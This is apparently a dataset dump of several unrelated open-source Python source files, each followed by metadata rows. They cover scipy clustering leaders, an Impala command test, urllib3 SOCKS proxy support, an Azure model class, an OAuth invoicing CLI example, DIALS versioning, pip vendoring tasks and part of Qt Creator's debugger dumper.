the ``fcluster`` function for more information on the format of ``T``.
For each flat cluster :math:`j` of the :math:`k` flat clusters
represented in the n-sized flat cluster assignment vector ``T``,
this function finds the lowest cluster node :math:`i` in the linkage
tree Z such that:
* leaf descendents belong only to flat cluster j
(i.e. ``T[p]==j`` for all :math:`p` in :math:`S(i)` where
:math:`S(i)` is the set of leaf ids of leaf nodes descendent
with cluster node :math:`i`)
* there does not exist a leaf that is not descendent with
:math:`i` that also belongs to cluster :math:`j`
(i.e. ``T[q]!=j`` for all :math:`q` not in :math:`S(i)`). If
this condition is violated, ``T`` is not a valid cluster
assignment vector, and an exception will be thrown.
Parameters
----------
Z : ndarray
The hierarchical clustering encoded as a matrix. See
``linkage`` for more information.
T : ndarray
The flat cluster assignment vector.
Returns
-------
L : ndarray
The leader linkage node id's stored as a k-element 1-D array
where ``k`` is the number of flat clusters found in ``T``.
``L[j]=i`` is the linkage cluster node id that is the
leader of flat cluster with id M[j]. If ``i < n``, ``i``
corresponds to an original observation, otherwise it
corresponds to a non-singleton cluster.
For example: if ``L[3]=2`` and ``M[3]=8``, the flat cluster with
id 8's leader is linkage node 2.
M : ndarray
The leader linkage node id's stored as a k-element 1-D array where
``k`` is the number of flat clusters found in ``T``. This allows the
set of flat cluster ids to be any arbitrary set of ``k`` integers.
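Examples
--------
A minimal sketch (assuming this module is importable as
``scipy.cluster.hierarchy``); the flat assignment comes from ``fcluster``:
>>> from scipy.cluster.hierarchy import linkage, fcluster, leaders
>>> X = [[0.0], [0.4], [5.0], [5.3]]
>>> Z = linkage(X, method='single')
>>> T = fcluster(Z, t=1.0, criterion='distance')
>>> L, M = leaders(Z, T)
>>> len(L) == len(set(int(i) for i in T))   # one leader per flat cluster
True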
"""
Z = np.asarray(Z, order='c')
T = np.asarray(T, order='c')
if type(T) != np.ndarray or T.dtype != 'i':
raise TypeError('T must be a one-dimensional numpy array of integers.')
is_valid_linkage(Z, throw=True, name='Z')
if len(T) != Z.shape[0] + 1:
raise ValueError('Mismatch: len(T)!=Z.shape[0] + 1.')
Cl = np.unique(T)
kk = len(Cl)
L = np.zeros((kk,), dtype='i')
M = np.zeros((kk,), dtype='i')
n = Z.shape[0] + 1
[Z, T] = _copy_arrays_if_base_present([Z, T])
s = _hierarchy.leaders(Z, T, L, M, int(kk), int(n))
if s >= 0:
raise ValueError(('T is not a valid assignment vector. Error found '
'when examining linkage node %d (< 2n-1).') % s)
return (L, M)
# These are test functions to help me test the leaders function.
def _leaders_test(Z, T):
tr = to_tree(Z)
_leaders_test_recurs_mark(tr, T)
return tr
def _leader_identify(tr, T):
if tr.is_leaf():
return T[tr.id]
else:
left = tr.get_left()
right = tr.get_right()
lfid = _leader_identify(left, T)
rfid = _leader_identify(right, T)
print('ndid: %d lid: %d lfid: %d rid: %d rfid: %d'
% (tr.get_id(), left.get_id(), lfid, right.get_id(), rfid))
if lfid != rfid:
if lfid != -1:
print('leader: %d with tag %d' % (left.id, lfid))
if rfid != -1:
print('leader: %d with tag %d' % (right.id, rfid))
return -1
else:
return lfid
def _leaders_test_recurs_mark(tr, T):
if tr.is_leaf():
tr.asgn = T[tr.id]
else:
tr.asgn = -1
_leaders_test_recurs_mark(tr.left, T)
_leaders_test_recurs_mark(tr.right, T)
|
bsd-3-clause
| 6,255,493,199,539,831,000
| 32.899373
| 155
| 0.588742
| false
| 3.920749
| false
| false
| false
|
cloudera/Impala
|
tests/unittests/test_command.py
|
2
|
1791
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
# Unit tests for collect_diagnostics.Command
import os
import pytest
import sys
# Update the sys.path to include the modules from bin/diagnostics.
sys.path.insert(0,
os.path.abspath(os.path.join(os.path.dirname(__file__), '../../bin/diagnostics')))
from collect_diagnostics import Command
class TestCommand(object):
""" Unit tests for the Command class"""
def test_simple_commands(self):
# Successful command
c = Command(["echo", "foo"], 1000)
assert c.run() == 0, "Command expected to succeed, but failed"
assert c.stdout.strip("\n") == "foo"
# Failed command, check return code
c = Command(["false"], 1000)
assert c.run() == 1
def test_command_timer(self):
# Try to run a command that sleeps for 1000s and set a
# timer for 1 second. The command should time out.
c = Command(["sleep", "1000"], 1)
assert c.run() != 0, "Command expected to timeout but succeeded."
assert c.child_killed_by_timeout, "Command didn't timeout as expected."
|
apache-2.0
| -3,043,633,197,999,597,600
| 35.55102
| 86
| 0.717476
| false
| 3.919037
| true
| false
| false
|
danielecook/gist-alfred
|
urllib3/contrib/socks.py
|
5
|
6386
|
# -*- coding: utf-8 -*-
"""
This module contains provisional support for SOCKS proxies from within
urllib3. This module supports SOCKS4 (specifically the SOCKS4A variant) and
SOCKS5. To enable its functionality, either install PySocks or install this
module with the ``socks`` extra.
The SOCKS implementation supports the full range of urllib3 features. It also
supports the following SOCKS features:
- SOCKS4
- SOCKS4a
- SOCKS5
- Usernames and passwords for the SOCKS proxy
Known Limitations:
- Currently PySocks does not support contacting remote websites via literal
IPv6 addresses. Any such connection attempt will fail. You must use a domain
name.
- Currently PySocks does not support IPv6 connections to the SOCKS proxy. Any
such connection attempt will fail.
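A minimal usage sketch (the proxy address and target URL below are
placeholders, not values shipped with this module):
    from urllib3.contrib.socks import SOCKSProxyManager
    proxy = SOCKSProxyManager('socks5h://localhost:1080/')
    response = proxy.request('GET', 'http://example.org/')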
"""
from __future__ import absolute_import
try:
import socks
except ImportError:
import warnings
from ..exceptions import DependencyWarning
warnings.warn((
'SOCKS support in urllib3 requires the installation of optional '
'dependencies: specifically, PySocks. For more information, see '
'https://urllib3.readthedocs.io/en/latest/contrib.html#socks-proxies'
),
DependencyWarning
)
raise
from socket import error as SocketError, timeout as SocketTimeout
from ..connection import (
HTTPConnection, HTTPSConnection
)
from ..connectionpool import (
HTTPConnectionPool, HTTPSConnectionPool
)
from ..exceptions import ConnectTimeoutError, NewConnectionError
from ..poolmanager import PoolManager
from ..util.url import parse_url
try:
import ssl
except ImportError:
ssl = None
class SOCKSConnection(HTTPConnection):
"""
A plain-text HTTP connection that connects via a SOCKS proxy.
"""
def __init__(self, *args, **kwargs):
self._socks_options = kwargs.pop('_socks_options')
super(SOCKSConnection, self).__init__(*args, **kwargs)
def _new_conn(self):
"""
Establish a new connection via the SOCKS proxy.
"""
extra_kw = {}
if self.source_address:
extra_kw['source_address'] = self.source_address
if self.socket_options:
extra_kw['socket_options'] = self.socket_options
try:
conn = socks.create_connection(
(self.host, self.port),
proxy_type=self._socks_options['socks_version'],
proxy_addr=self._socks_options['proxy_host'],
proxy_port=self._socks_options['proxy_port'],
proxy_username=self._socks_options['username'],
proxy_password=self._socks_options['password'],
proxy_rdns=self._socks_options['rdns'],
timeout=self.timeout,
**extra_kw
)
except SocketTimeout:
raise ConnectTimeoutError(
self, "Connection to %s timed out. (connect timeout=%s)" %
(self.host, self.timeout))
except socks.ProxyError as e:
# This is fragile as hell, but it seems to be the only way to raise
# useful errors here.
if e.socket_err:
error = e.socket_err
if isinstance(error, SocketTimeout):
raise ConnectTimeoutError(
self,
"Connection to %s timed out. (connect timeout=%s)" %
(self.host, self.timeout)
)
else:
raise NewConnectionError(
self,
"Failed to establish a new connection: %s" % error
)
else:
raise NewConnectionError(
self,
"Failed to establish a new connection: %s" % e
)
except SocketError as e: # Defensive: PySocks should catch all these.
raise NewConnectionError(
self, "Failed to establish a new connection: %s" % e)
return conn
# We don't need to duplicate the Verified/Unverified distinction from
# urllib3/connection.py here because the HTTPSConnection will already have been
# correctly set to either the Verified or Unverified form by that module. This
# means the SOCKSHTTPSConnection will automatically be the correct type.
class SOCKSHTTPSConnection(SOCKSConnection, HTTPSConnection):
pass
class SOCKSHTTPConnectionPool(HTTPConnectionPool):
ConnectionCls = SOCKSConnection
class SOCKSHTTPSConnectionPool(HTTPSConnectionPool):
ConnectionCls = SOCKSHTTPSConnection
class SOCKSProxyManager(PoolManager):
"""
A version of the urllib3 ProxyManager that routes connections via the
defined SOCKS proxy.
"""
pool_classes_by_scheme = {
'http': SOCKSHTTPConnectionPool,
'https': SOCKSHTTPSConnectionPool,
}
def __init__(self, proxy_url, username=None, password=None,
num_pools=10, headers=None, **connection_pool_kw):
parsed = parse_url(proxy_url)
if username is None and password is None and parsed.auth is not None:
split = parsed.auth.split(':')
if len(split) == 2:
username, password = split
if parsed.scheme == 'socks5':
socks_version = socks.PROXY_TYPE_SOCKS5
rdns = False
elif parsed.scheme == 'socks5h':
socks_version = socks.PROXY_TYPE_SOCKS5
rdns = True
elif parsed.scheme == 'socks4':
socks_version = socks.PROXY_TYPE_SOCKS4
rdns = False
elif parsed.scheme == 'socks4a':
socks_version = socks.PROXY_TYPE_SOCKS4
rdns = True
else:
raise ValueError(
"Unable to determine SOCKS version from %s" % proxy_url
)
self.proxy_url = proxy_url
socks_options = {
'socks_version': socks_version,
'proxy_host': parsed.host,
'proxy_port': parsed.port,
'username': username,
'password': password,
'rdns': rdns
}
connection_pool_kw['_socks_options'] = socks_options
super(SOCKSProxyManager, self).__init__(
num_pools, headers, **connection_pool_kw
)
self.pool_classes_by_scheme = SOCKSProxyManager.pool_classes_by_scheme
|
mit
| 9,006,006,380,867,902,000
| 32.260417
| 79
| 0.612903
| false
| 4.407177
| false
| false
| false
|
AutorestCI/azure-sdk-for-python
|
azure-servicefabric/azure/servicefabric/models/chaos_context_map_item.py
|
1
|
1090
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class ChaosContextMapItem(Model):
"""Describes an item in the ChaosContextMap in ChaosParameters.
.
:param key: The key for a ChaosContextMapItem.
:type key: str
:param value: The value for a ChaosContextMapItem.
:type value: str
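Example (illustrative only; the key and value strings are arbitrary)::
    item = ChaosContextMapItem(key='ClusterSize', value='5')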
"""
_validation = {
'key': {'required': True},
'value': {'required': True},
}
_attribute_map = {
'key': {'key': 'Key', 'type': 'str'},
'value': {'key': 'Value', 'type': 'str'},
}
def __init__(self, key, value):
self.key = key
self.value = value
|
mit
| -7,523,740,089,934,637,000
| 28.459459
| 76
| 0.544954
| false
| 4.192308
| false
| false
| false
|
mirumee/python-invoicible
|
examples/cli.py
|
1
|
7581
|
import cmd
import copy
import httplib
import oauth.oauth as oauth
import pprint
import readline
import sys
import urlparse
import webbrowser
import invoicible
# key and secret granted by the service provider for this consumer application
CONSUMER_KEY = ''
CONSUMER_SECRET_KEY = ''
# access token for this consumer application which allows access to user resources
ACCESS_TOKEN_KEY = ''
ACCESS_TOKEN_SECRET = ''
COMPANY_DOMAIN = ''
def ask(question):
while True:
result = raw_input(question)
if result.lower() in ('y', 'yes', ''):
return True
elif result.lower() in ('n', 'no'):
return False
class InvoicibleOAuthHelper(oauth.OAuthClient):
"""
This is a helper for OAuth authorization; if you are going to create your own
client you should check the logic of the authorize method.
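A minimal sketch (the consumer keys and company domain below are
placeholders, not working credentials):
    helper = InvoicibleOAuthHelper('my-consumer-key', 'my-consumer-secret',
                                   'mycompany.centrumfaktur.pl')
    access_token = helper.authorize()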
"""
request_token_path = '/oauth/request/token/'
access_token_path = '/oauth/access/token/'
authorization_path = '/oauth/autoryzacja/'
def __init__(self, consumer_key, consumer_secret, company_domain):
self.company_domain = company_domain
self.connection = httplib.HTTPSConnection(self.company_domain)
self.consumer = oauth.OAuthConsumer(consumer_key, consumer_secret)
self.signature_method_hmac_sha1 = oauth.OAuthSignatureMethod_HMAC_SHA1()
def authorize(self):
request_token = self.fetch_request_token()
verifier = self.authorize_token(request_token)
access_token = self.fetch_access_token(verifier)
return access_token
def fetch_request_token(self):
oauth_request = oauth.OAuthRequest.from_consumer_and_token(
self.consumer,
http_url=urlparse.urlunparse(("https", self.company_domain, self.request_token_path, None, None, None))
)
oauth_request.sign_request(self.signature_method_hmac_sha1, self.consumer, None)
self.connection.request(
oauth_request.http_method,
self.request_token_path,
headers=oauth_request.to_header()
)
response = self.connection.getresponse()
self._request_token = oauth.OAuthToken.from_string(response.read())
return self._request_token
def fetch_verifier(self, url):
webbrowser.open_new(url)
verifier = raw_input('Copy the verifier which you should see on the page after authorization:')
return verifier
def authorize_token(self, request_token):
oauth_request = oauth.OAuthRequest.from_token_and_callback(
token=request_token,
http_url=urlparse.urlunparse(("https", self.company_domain, self.authorization_path, None, None, None))
)
self._verifier = self.fetch_verifier(oauth_request.to_url())
return self._verifier
def fetch_access_token(self, verifier=None):
self._request_token.verifier = verifier
oauth_request = oauth.OAuthRequest.from_consumer_and_token(
self.consumer,
token=self._request_token,
http_url=urlparse.urlunparse(("https", self.company_domain, self.access_token_path, None, None, None))
)
oauth_request.sign_request(self.signature_method_hmac_sha1, self.consumer, self._request_token)
self.connection.request(oauth_request.http_method, self.access_token_path, headers=oauth_request.to_header())
response = self.connection.getresponse()
self.access_token = oauth.OAuthToken.from_string(response.read())
return self.access_token
class SimpleClientCommandLine(cmd.Cmd):
"""
Really simple invoicible application. It allows listing and deleting some resources through the API.
"""
def __init__(self, client, *args, **kwargs):
self.client = client
self.customer_manager = invoicible.CustomerManager(self.client)
self.estimate_manager = invoicible.EstimateManager(self.client)
self.invoice_manager = invoicible.InvoiceManager(self.client)
self.prompt = "invoicible$ "
self.intro = "\nThis is really simple invoicible api client. Type 'help' or '?' for usage hints.\n"
#cmd.Cmd is old style class
cmd.Cmd.__init__(self, *args, **kwargs)
def do_help(self, *args):
print "list"
#print "create"
print "delete"
print "quit"
def help_delete(self):
print "delete resource_uri"
def do_delete(self, line):
args = line.split()
if len(args) != 1:
return self.help_delete()
else:
self.client.delete_resource(args[0])
def help_list(self):
print "list invoices|estimates|customers"
def do_list(self, line):
args = line.split()
if len(args) != 1 or args[0] not in ['invoices', 'customers', 'estimates']:
return self.help_list()
if args[0] == 'customers':
result = self.customer_manager.all()
elif args[0] == 'estimates':
result = self.estimate_manager.all()
else:
result = self.invoice_manager.all()
pprint.pprint(result)
def complete_list(self, line, *args):
return [ command for command in ('invoices', 'customers', 'estimates') if command.startswith(line)]
def do_EOF(self, line):
print ""
return 1
do_quit = do_EOF
def run_example(consumer_key=CONSUMER_KEY, consumer_secret=CONSUMER_SECRET_KEY,
access_token_key=ACCESS_TOKEN_KEY, access_token_secret=ACCESS_TOKEN_SECRET, company_domain=COMPANY_DOMAIN):
if not consumer_key or not consumer_secret:
print """
You have not provided application (oauth consumer) keys. Please search the invoicible API (centrumfaktur.pl/api)
documentation for testing keys (or generate new ones for your application in the invoicible service)
and put those values into this file (%s) as CONSUMER_KEY and CONSUMER_SECRET_KEY.
""" % (__file__)
sys.exit(1)
if not company_domain:
company_domain = raw_input("Please provide company domain (and put it to this file as COMPANY_DOMAIN to prevent this step in the future) which resources you want to access (for example: mycompany.centrumfaktur.pl): ")
if not access_token_key and not access_token_secret:
print """
You have not provided an OAuth access token which allows your application to access the given user's resources.
If you already have those keys generated, please put them into this file (%s) as ACCESS_TOKEN_KEY and
ACCESS_TOKEN_SECRET.
""" % (__file__)
if not ask("Do you want to generate access token ([y]/n)?"):
sys.exit(1)
oauth_helper = InvoicibleOAuthHelper(consumer_key, consumer_secret, company_domain)
access_token = oauth_helper.authorize()
access_token_key, access_token_secret = access_token.key, access_token.secret
print """
Please copy the access token key: %s and access token secret: %s as ACCESS_TOKEN_KEY and ACCESS_TOKEN_SECRET
into this file (%s) so that the application authorization step is skipped next time.
""" % (access_token_key, access_token_secret, __file__)
if not company_domain:
company_domain = raw_input("Please provide company domain (for example: mycompany.centrumfaktur.pl - you can put it to this file as COMPANY_DOMAIN):")
invoicible_client = invoicible.Client(
consumer_key,
consumer_secret,
access_token_key,
access_token_secret,
invoicible_domain = company_domain,
)
command_line = SimpleClientCommandLine(invoicible_client)
command_line.cmdloop()
if __name__ == "__main__":
run_example()
|
lgpl-3.0
| -4,260,646,054,423,910,400
| 37.678571
| 225
| 0.664688
| false
| 3.863914
| false
| false
| false
|
dials/dials
|
util/version.py
|
1
|
4510
|
# DIALS version numbers are constructed from
# 1. a common prefix
__dials_version_format = "DIALS %s"
# 2. the most recent annotated git tag (or failing that: a default string)
__dials_version_default = "3.5"
# 3. a dash followed by the number of commits since that tag
# 4. a dash followed by a lowercase 'g' and the current commit id
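# For illustration with made-up values: a `git describe` result of
# "v3.5.0-42-gabc1234" ends up reported as "DIALS 3.5.42-gabc1234"
# after the rewriting performed in get_git_version() below.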
def get_git_version(dials_path, treat_merges_as_single_commit=False):
import os
import subprocess
version = None
with open(os.devnull, "w") as devnull:
# Obtain the name of the current branch. If this fails, the other commands will probably also fail
branch = (
subprocess.check_output(
["git", "branch", "--all", "--contains", "HEAD"],
cwd=dials_path,
stderr=devnull,
)
.rstrip()
.decode("latin-1")
)
releasebranch = "dials-3" in branch
# Always treat merges as single commit on release branches
if releasebranch:
treat_merges_as_single_commit = True
# Get descriptive version string, eg. v1.1.0-1-g56f9cd7
if treat_merges_as_single_commit:
try:
# Get a 'correct' depth, which should be the shortest path to the most recent tag
version = (
subprocess.check_output(
["git", "describe", "--long", "--first-parent"],
cwd=dials_path,
stderr=devnull,
)
.rstrip()
.decode("latin-1")
)
except Exception:
pass # This is not supported on older git versions < 1.8.4.
if version is None:
# Find the most recent tag
version = (
subprocess.check_output(
["git", "describe", "--long"], cwd=dials_path, stderr=devnull
)
.rstrip()
.decode("latin-1")
)
if treat_merges_as_single_commit:
tag = version[: version.rindex("-", 0, version.rindex("-"))]
commit = version[version.rindex("-") + 1 :] # 'gxxxxxxx'
# Now find the first-parent-path
depth = subprocess.check_output(
["git", "rev-list", f"{tag}..HEAD", "--first-parent"],
cwd=dials_path,
stderr=devnull,
).rstrip()
if depth:
depth = depth.strip().count("\n") + 1
else:
depth = 0
version = "%s-%d-%s" % (tag, depth, commit)
# Turn descriptive version string into proper version number
if version[0] == "v":
version = version[1:].replace(".0-", "-")
version = version.replace("-", ".", 1)
# If we are on a release branch, then append a '-release'-tag
if releasebranch:
version = version + "-release"
return str(version)
# When run from a development installation the version information is extracted
# from the git repository. Otherwise it is read from the file '.gitversion' in the
# DIALS module directory.
def dials_version():
"""Try to obtain the current git revision number
and store a copy in .gitversion"""
version = None
try:
import os
dials_path = os.path.dirname(os.path.dirname(os.path.realpath(__file__)))
version_file = os.path.join(dials_path, ".gitversion")
# 1. Try to access information in .git directory
# Regenerate .gitversion if possible
if not os.environ.get("DIALS_SKIP_GIT_VERSIONING") and os.path.exists(
os.path.join(dials_path, ".git")
):
try:
version = get_git_version(dials_path)
with open(version_file, "w") as gv:
gv.write(version)
except Exception:
if version == "":
version = None
# 2. If .git directory missing or 'git describe' failed, read .gitversion
if (version is None) and os.path.exists(version_file):
with open(version_file) as gv:
version = gv.read().rstrip()
except Exception:
pass
if version is None:
version = __dials_version_format % __dials_version_default
else:
version = __dials_version_format % version
return version
|
bsd-3-clause
| 3,118,716,970,657,075,000
| 35.967213
| 106
| 0.531486
| false
| 4.278937
| false
| false
| false
|
sigmavirus24/pip
|
tasks/vendoring/__init__.py
|
1
|
3688
|
""""Vendoring script, python 3.5 needed"""
from pathlib import Path
import re
import shutil
import invoke
TASK_NAME = 'update'
FILE_WHITE_LIST = (
'Makefile',
'vendor.txt',
'__init__.py',
'README.rst',
)
def drop_dir(path):
shutil.rmtree(str(path))
def remove_all(paths):
for path in paths:
if path.is_dir():
drop_dir(path)
else:
path.unlink()
def log(msg):
print('[vendoring.%s] %s' % (TASK_NAME, msg))
def clean_vendor(ctx, vendor_dir):
# Old _vendor cleanup
remove_all(vendor_dir.glob('*.pyc'))
log('Cleaning %s' % vendor_dir)
for item in vendor_dir.iterdir():
if item.is_dir():
shutil.rmtree(str(item))
elif item.name not in FILE_WHITE_LIST:
item.unlink()
else:
log('Skipping %s' % item)
def rewrite_imports(package_dir, vendored_libs):
for item in package_dir.iterdir():
if item.is_dir():
rewrite_imports(item, vendored_libs)
elif item.name.endswith('.py'):
rewrite_file_imports(item, vendored_libs)
def rewrite_file_imports(item, vendored_libs):
"""Rewrite 'import xxx' and 'from xxx import' for vendored_libs"""
text = item.read_text()
# Revendor pkg_resources.extern first
text = re.sub(r'pkg_resources.extern', r'pip._vendor', text)
for lib in vendored_libs:
text = re.sub(
r'(\n\s*)import %s' % lib,
r'\1from pip._vendor import %s' % lib,
text,
)
text = re.sub(
r'(\n\s*)from %s' % lib,
r'\1from pip._vendor.%s' % lib,
text,
)
item.write_text(text)
def apply_patch(ctx, patch_file_path):
log('Applying patch %s' % patch_file_path.name)
ctx.run('git apply %s' % patch_file_path)
def vendor(ctx, vendor_dir):
log('Reinstalling vendored libraries')
ctx.run(
'pip install -t {0} -r {0}/vendor.txt --no-compile'.format(
str(vendor_dir),
)
)
remove_all(vendor_dir.glob('*.dist-info'))
remove_all(vendor_dir.glob('*.egg-info'))
# Cleanup setuptools unneeded parts
(vendor_dir / 'easy_install.py').unlink()
drop_dir(vendor_dir / 'setuptools')
drop_dir(vendor_dir / 'pkg_resources' / '_vendor')
drop_dir(vendor_dir / 'pkg_resources' / 'extern')
# Drop interpreter and OS specific msgpack libs.
# Pip will rely on the python-only fallback instead.
remove_all(vendor_dir.glob('msgpack/*.so'))
# Detect the vendored packages/modules
vendored_libs = []
for item in vendor_dir.iterdir():
if item.is_dir():
vendored_libs.append(item.name)
elif item.name not in FILE_WHITE_LIST:
vendored_libs.append(item.name[:-3])
log("Detected vendored libraries: %s" % ", ".join(vendored_libs))
# Global import rewrites
log("Rewriting all imports related to vendored libs")
for item in vendor_dir.iterdir():
if item.is_dir():
rewrite_imports(item, vendored_libs)
elif item.name not in FILE_WHITE_LIST:
rewrite_file_imports(item, vendored_libs)
# Special cases: apply stored patches
log("Apply patches")
patch_dir = Path(__file__).parent / 'patches'
for patch in patch_dir.glob('*.patch'):
apply_patch(ctx, patch)
@invoke.task(name=TASK_NAME)
def main(ctx):
git_root = Path(
ctx.run('git rev-parse --show-toplevel', hide=True).stdout.strip()
)
vendor_dir = git_root / 'pip' / '_vendor'
log('Using vendor dir: %s' % vendor_dir)
clean_vendor(ctx, vendor_dir)
vendor(ctx, vendor_dir)
log('Revendoring complete')
|
mit
| 8,446,935,301,462,685,000
| 26.729323
| 74
| 0.594902
| false
| 3.325518
| false
| false
| false
|
pivonroll/Qt_Creator
|
share/qtcreator/debugger/dumper.py
|
1
|
74430
|
############################################################################
#
# Copyright (C) 2016 The Qt Company Ltd.
# Contact: https://www.qt.io/licensing/
#
# This file is part of Qt Creator.
#
# Commercial License Usage
# Licensees holding valid commercial Qt licenses may use this file in
# accordance with the commercial license agreement provided with the
# Software or, alternatively, in accordance with the terms contained in
# a written agreement between you and The Qt Company. For licensing terms
# and conditions see https://www.qt.io/terms-conditions. For further
# information use the contact form at https://www.qt.io/contact-us.
#
# GNU General Public License Usage
# Alternatively, this file may be used under the terms of the GNU
# General Public License version 3 as published by the Free Software
# Foundation with exceptions as appearing in the file LICENSE.GPL3-EXCEPT
# included in the packaging of this file. Please review the following
# information to ensure the GNU General Public License requirements will
# be met: https://www.gnu.org/licenses/gpl-3.0.html.
#
############################################################################
import os
import struct
import sys
import base64
import re
import time
import json
import inspect
if sys.version_info[0] >= 3:
xrange = range
toInteger = int
else:
toInteger = long
verbosity = 0
verbosity = 1
# Debugger start modes. Keep in sync with DebuggerStartMode in debuggerconstants.h
NoStartMode, \
StartInternal, \
StartExternal, \
AttachExternal, \
AttachCrashedExternal, \
AttachCore, \
AttachToRemoteServer, \
AttachToRemoteProcess, \
StartRemoteProcess, \
= range(0, 9)
# Known special formats. Keep in sync with DisplayFormat in debuggerprotocol.h
AutomaticFormat, \
RawFormat, \
SimpleFormat, \
EnhancedFormat, \
SeparateFormat, \
Latin1StringFormat, \
SeparateLatin1StringFormat, \
Utf8StringFormat, \
SeparateUtf8StringFormat, \
Local8BitStringFormat, \
Utf16StringFormat, \
Ucs4StringFormat, \
Array10Format, \
Array100Format, \
Array1000Format, \
Array10000Format, \
ArrayPlotFormat, \
CompactMapFormat, \
DirectQListStorageFormat, \
IndirectQListStorageFormat, \
= range(0, 20)
# Breakpoints. Keep synchronized with BreakpointType in breakpoint.h
UnknownType, \
BreakpointByFileAndLine, \
BreakpointByFunction, \
BreakpointByAddress, \
BreakpointAtThrow, \
BreakpointAtCatch, \
BreakpointAtMain, \
BreakpointAtFork, \
BreakpointAtExec, \
BreakpointAtSysCall, \
WatchpointAtAddress, \
WatchpointAtExpression, \
BreakpointOnQmlSignalEmit, \
BreakpointAtJavaScriptThrow, \
= range(0, 14)
def arrayForms():
return [ArrayPlotFormat]
def mapForms():
return [CompactMapFormat]
class ReportItem:
"""
Helper structure to keep temporary "best" information about a value
or a type scheduled to be reported. This might get overridden by
subsequent better guesses during a putItem() run.
"""
def __init__(self, value = None, encoding = None, priority = -100, elided = None):
self.value = value
self.priority = priority
self.encoding = encoding
self.elided = elided
def __str__(self):
return "Item(value: %s, encoding: %s, priority: %s, elided: %s)" \
% (self.value, self.encoding, self.priority, self.elided)
class Blob(object):
"""
Helper structure to keep a blob of bytes, possibly
in the inferior.
"""
def __init__(self, data, isComplete = True):
self.data = data
self.size = len(data)
self.isComplete = isComplete
def size(self):
return self.size
def toBytes(self):
"""Retrieves "lazy" contents from memoryviews."""
data = self.data
major = sys.version_info[0]
if major == 3 or (major == 2 and sys.version_info[1] >= 7):
if isinstance(data, memoryview):
data = data.tobytes()
if major == 2 and isinstance(data, buffer):
data = ''.join([c for c in data])
return data
def toString(self):
data = self.toBytes()
return data if sys.version_info[0] == 2 else data.decode("utf8")
def extractByte(self, offset = 0):
return struct.unpack_from("b", self.data, offset)[0]
def extractShort(self, offset = 0):
return struct.unpack_from("h", self.data, offset)[0]
def extractUShort(self, offset = 0):
return struct.unpack_from("H", self.data, offset)[0]
def extractInt(self, offset = 0):
return struct.unpack_from("i", self.data, offset)[0]
def extractUInt(self, offset = 0):
return struct.unpack_from("I", self.data, offset)[0]
def extractLong(self, offset = 0):
return struct.unpack_from("l", self.data, offset)[0]
# FIXME: Note these should take target architecture into account.
def extractULong(self, offset = 0):
return struct.unpack_from("L", self.data, offset)[0]
def extractInt64(self, offset = 0):
return struct.unpack_from("q", self.data, offset)[0]
def extractUInt64(self, offset = 0):
return struct.unpack_from("Q", self.data, offset)[0]
def extractDouble(self, offset = 0):
return struct.unpack_from("d", self.data, offset)[0]
def extractFloat(self, offset = 0):
return struct.unpack_from("f", self.data, offset)[0]
def warn(message):
print('bridgemessage={msg="%s"},' % message.replace('"', '$').encode("latin1"))
def showException(msg, exType, exValue, exTraceback):
warn("**** CAUGHT EXCEPTION: %s ****" % msg)
try:
import traceback
for line in traceback.format_exception(exType, exValue, exTraceback):
warn("%s" % line)
except:
pass
class Children:
def __init__(self, d, numChild = 1, childType = None, childNumChild = None,
maxNumChild = None, addrBase = None, addrStep = None):
self.d = d
self.numChild = numChild
self.childNumChild = childNumChild
self.maxNumChild = maxNumChild
self.addrBase = addrBase
self.addrStep = addrStep
self.printsAddress = True
if childType is None:
self.childType = None
else:
self.childType = d.stripClassTag(str(childType))
if not self.d.isCli:
self.d.put('childtype="%s",' % self.childType)
if childNumChild is None:
pass
#if self.d.isSimpleType(childType):
# self.d.put('childnumchild="0",')
# self.childNumChild = 0
#elif childType.code == PointerCode:
# self.d.put('childnumchild="1",')
# self.childNumChild = 1
else:
self.d.put('childnumchild="%s",' % childNumChild)
self.childNumChild = childNumChild
self.printsAddress = not self.d.putAddressRange(addrBase, addrStep)
def __enter__(self):
self.savedChildType = self.d.currentChildType
self.savedChildNumChild = self.d.currentChildNumChild
self.savedNumChild = self.d.currentNumChild
self.savedMaxNumChild = self.d.currentMaxNumChild
self.savedPrintsAddress = self.d.currentPrintsAddress
self.d.currentChildType = self.childType
self.d.currentChildNumChild = self.childNumChild
self.d.currentNumChild = self.numChild
self.d.currentMaxNumChild = self.maxNumChild
self.d.currentPrintsAddress = self.printsAddress
self.d.put(self.d.childrenPrefix)
def __exit__(self, exType, exValue, exTraceBack):
if not exType is None:
if self.d.passExceptions:
showException("CHILDREN", exType, exValue, exTraceBack)
self.d.putNumChild(0)
self.d.putSpecialValue("notaccessible")
if not self.d.currentMaxNumChild is None:
if self.d.currentMaxNumChild < self.d.currentNumChild:
self.d.put('{name="<incomplete>",value="",type="",numchild="0"},')
self.d.currentChildType = self.savedChildType
self.d.currentChildNumChild = self.savedChildNumChild
self.d.currentNumChild = self.savedNumChild
self.d.currentMaxNumChild = self.savedMaxNumChild
self.d.currentPrintsAddress = self.savedPrintsAddress
self.d.putNewline()
self.d.put(self.d.childrenSuffix)
return True
class PairedChildrenData:
def __init__(self, d, pairType, keyType, valueType, useKeyAndValue):
self.useKeyAndValue = useKeyAndValue
self.pairType = pairType
self.keyType = keyType
self.valueType = valueType
self.isCompact = d.isMapCompact(self.keyType, self.valueType)
self.childType = valueType if self.isCompact else pairType
ns = d.qtNamespace()
keyTypeName = d.stripClassTag(str(self.keyType))
self.keyIsQString = keyTypeName == ns + "QString"
self.keyIsQByteArray = keyTypeName == ns + "QByteArray"
self.keyIsStdString = keyTypeName == "std::string" \
or keyTypeName.startswith("std::basic_string<char")
class PairedChildren(Children):
def __init__(self, d, numChild, useKeyAndValue = False,
